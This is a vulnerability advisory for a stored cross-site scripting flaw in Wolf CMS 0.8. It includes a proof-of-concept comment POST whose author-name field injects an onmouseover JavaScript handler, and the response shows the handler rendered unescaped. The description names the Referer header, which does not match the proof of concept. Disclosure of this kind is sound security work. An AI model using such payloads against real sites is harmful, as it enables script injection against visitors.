[+] Title Wolf CMS 0.8 - Stored Cross-Site Scripting (XSS) Vulnerability [+] Credit Mattia Reggiani (info@mattiareggiani.com) [+] Advisory https://github.com/mattiareggiani/Security-Advisories/blob/master/MR-16-03_WolfCMS.pdf [+] Vendor Homepage https://www.wolfcms.org/ [+] Affected Version 0.8 [+] Tested on Ubuntu Server 14.04, web server Apache 2.2.31 [+] CVE N/A [+] Severity High [+] Summary Wolf CMS is an open source content management system which simplifies content management by offering an elegant user interface, flexible templating per page, simple user management and permissions, as well as the tools necessary for file management. Wolf CMS is written using the MySQL / SQLite 3 / PostgreSQL database and the PHP programming language. Wolf CMS is prone to stored cross-site scripting (XSS) vulnerabilities, which could be used by malicious users to inject arbitrary JavaScript code in victim's browser. [+] Vulnerabilities [+][+] Stored Cross Site Scripting (XSS) # Description: Multiple stored XSS vulnerability has been found in HTTP Referer header. This can lead to arbitrary execution of code client-side (eg. Javascript). # Proof of Concept: >HTTP Request POST /wolfCMS/?about-us/sdgdfgdfsg.html HTTP/1.1 [Headers]: ... [Post Data]: comment%5Bauthor_name%5D=%22+onmouseover%3Dprompt%28%221337%22%29+bad%3D%22&comment%5Bauthor_email%5D=xss%40xss.xss&comment%5Bauthor_link%5D=website&comment%5Bauthor_ip%5D=127.0.0.1&comment%5Bbody%5D=Test+2+Cross+Site+Vulnerability+%28XSS%29&commit-comment=Submit+comment >HTTP Response ... <p> à <a href="http://website" title="" onmouseover=prompt("1337") bad="">" onmouseover=prompt("1337") bad="</a> <small class="comment-date"></small></p> ... [+] Disclosure timeline # Discovery: 05/06/16 # Vendor disclosure: 09/06/16 # Vendor acknowledgment: N/A # Patch release: N/A # Public disclosure: 19/07/16